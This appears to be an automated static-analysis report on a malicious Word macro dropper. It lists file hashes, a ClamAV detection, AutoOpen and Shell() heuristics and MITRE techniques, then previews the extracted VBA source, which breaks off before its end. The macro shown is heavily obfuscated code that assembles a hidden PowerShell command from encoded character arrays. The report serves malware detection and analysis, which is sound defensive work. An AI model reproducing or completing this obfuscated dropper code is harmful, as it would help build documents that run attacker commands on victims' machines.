Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5406329cd04f810f…

MALICIOUS

Office (OLE)

89.8 KB Created: 2018-06-28 11:59:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: cc6334aa5ebc5feaaf5efc080e6b3bb7 SHA-1: e23c8166363831aa5b4dcc0f6d5c3f797a81573c SHA-256: 5406329cd04f810f36efab7d7d1e5a29c1375521acfb7012ad3b65379501d266
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The script constructs strings that appear to be part of a command execution payload, specifically referencing 'sShellId[1]' and 'SHEl'. The ClamAV detection 'Doc.Dropper.Agent-6595092-0' further supports its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6595092-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6595092-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8658 bytes
SHA-256: cb58971e950b67c5e987ddf9c9777a02b92e83f3ad0f8f7fd181ce7a8e57bd02
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aEswBrswCjiowW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MBbZWjKCb"
Function hsiTYDTUZfB()
On Error Resume Next
ckbXWA _
= 11096 + Atn(7081) / 91562 / _
Round(31855) / 6674 / CInt(LTXRD)
nawUNs = ChrB(20375 + _
Sin(YofiKi * CLng(BUmSf + 58772) _
 + 91739 _
+ NwQkt))
tMEBmXjY = "HELL" + "     " + "     " + "       " + "     " + "         " + "        " + "   ." + Chr(40) + " $" + "sHellId[1"
TwXpq _
= 33038 + Atn(93636) / 78103 / _
Round(15590) / 44639 / CInt(NpcRXR)
UAJwk = ChrB(98961 + _
Sin(TsBkW * CLng(HQXFrH + 79350) _
 + 40055 _
+ VNMPi))
hTXRLUAG = "]" + Chr(43) + "$SHEl" + "lID[13]" + Chr(43) + "'" + "x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " " + "$" + Chr(40) + " Se" + "T-VarIa" + "BLE '" + "oFs'  " + "''" + Chr(41) + Chr(34) + " " + Chr(43) + " [STRIN"
pTHph _
= 21579 + Atn(31041) / 86946 / _
Round(99755) / 40973 / CInt(YQWYv)
lacwR = ChrB(43546 + _
Sin(QbkCfw * CLng(VQGiYt + 90772) _
 + 78782 _
+ rXXkfj))
ssdLSvfPk = "G]" + Chr(40) + " [CH" + "ar[]]" + Chr(40) + "2" + " , 92" + ",64 , 6" + "4, 27 " + ", 72,67," + " 81 ,"
wsZJb _
= 78626 + Atn(13435) / 41645 / _
Round(46867) / 94220 / CInt(ZFaNND)
qHKrAC = ChrB(16745 + _
Sin(pkYtmv * CLng(DmKFnK + 62099) _
 + 18245 _
+ FbMVjL))
Xziir = "11 ," + "73,6" + "8 , " + "76 , 6" + "7 ,69 ," + " 82, " + "6, 104, 6" + "7 , " + "82, 8, "
JUAobN _
= 13032 + Atn(85756) / 45094 / _
Round(937) / 58225 / CInt(WzfKms)
oDIPZ = ChrB(20519 + _
Sin(ZlYpmN * CLng(GOYmGE + 79825) _
 + 60382 _
+ infjn))
LKzVAzH = "113,67" + " , 6" + "8 , 1" + "01, 74 ," + "79,67, " + "72 , 82,2" + "9 , 2, 82" + " , 87 , " + "98 ,27, "
aRZdhW _
= 51412 + Atn(3338) / 10733 / _
Round(50858) / 56960 / CInt(oUUhNQ)
PiGYf = ChrB(76480 + _
Sin(IlZct * CLng(LlLHQJ + 61786) _
 + 14147 _
+ NSLdbB))
RujLTLYb = "1 ,78 , " + "82 , " + "82, 86" + ", 85 ,2" + "8 , 9 " + ", 9,84 ," + " 73 " + ", 69 ,"
zAZPK _
= 46479 + Atn(10862) / 38492 / _
Round(86706) / 88880 / CInt(UNpcdj)
SCJMRD = ChrB(70688 + _
Sin(iVoMC * CLng(LwoYC + 58849) _
 + 37072 _
+ jqOVUL))
HYAZPASdmJd = " 77 , 72" + " , 84," + "73,74, 74" + " ,67 , 82" + ", 69 ," + "73 ,8 , "
rlpfdJ _
= 97675 + Atn(1112) / 70737 / _
Round(68555) / 41935 / CInt(wpkfjr)
JPADaC = ChrB(61924 + _
Sin(WSwvjZ * CLng(rjwjY + 4580) _
 + 24254 _
+ DpjAWz))
ivHLVoK = "82 ,73" + ",86 , " + "9, 64" + ", 79 ,74," + " 67 , 9" + " ,94," + " 94, 6"
LhirCd _
= 81509 + Atn(65186) / 27897 / _
Round(55881) / 95093 / CInt(chmomF)
zAhzSa = ChrB(93520 + _
Sin(zOuBJ * CLng(aHRRrX + 82533) _
 + 2729 _
+ kDbYk))
NXLfWJ = "9 ,69" + " ,69, 75," + "75, 75 " + ", 8 ,67" + " ,94" + " , 67" + ", 1 " + ", 8,11" + "7 , 86" + ",74 , 7"
hsiTYDTUZfB = tMEBmXjY + hTXRLUAG + ssdLSvfPk + Xziir + LKzVAzH + RujLTLYb + HYAZPASdmJd + ivHLVoK + NXLfWJ
RAuvu _
= 578 + Atn(90122) / 57692 / _
Round(64324) / 21696 / CInt(FMtTU)
nwBZVX = ChrB(89552 + _
Sin(kvwwvr * CLng(MBjNz + 12936) _
 + 27875 _
+ fdjFbR))
End Function
Function XKaEmww()
On Error Resume Next
IiPcnb _
= 65585 + Atn(81342) / 91677 / _
Round(56646) / 99337 / CInt(KEwhl)
NtKMG = ChrB(39772 + _
Sin(ZPWwl * CLng(SQGnQ + 63436) _
 + 36998 _
+ biLkj))
uRnhGqlQQQ = "9 ,82 ," + " 14 ,1 " + ",102, 1, " + "15,29 ," + " 2 ,113" + ", 74 , 74" + " ,6, 27" + ", 6,1, 1" + "9 , 1" + "8, 19" + " ,1 " + ",29 ,2 "
tEcjw _
= 96366 + Atn(73207) / 27367 / _
Round(46892) / 38639 / CInt(bvINLL)
JLjwEQ = ChrB(60809 + _
Sin(SPlOz * CLng(WUaVmm + 98841) _
 + 76386 _
+ Eslsol))
ZOqLromGc = ", 64 ," + " 87 ," + " 113 ,27" + " , 2" + " , 67" + ",72,80 ," + " 28,8" + "2 , 6" + "7 ,7" + "5 , 86"
qPSRa _
= 45995 + Atn(37270) / 94554 / _
Round(369) / 23615 / CInt(wfWcJ)
TEahs = ChrB(48851 + _
Sin(uWjcE * CLng(YqOHZ + 42692) _
 + 92287 _
+ BwBdUa))
ARwwL = ", 13 ," + " 1 , " + "122,1 ," + "13 , " + "2, 113,7" + "4, 7" + "4 ,
... (truncated)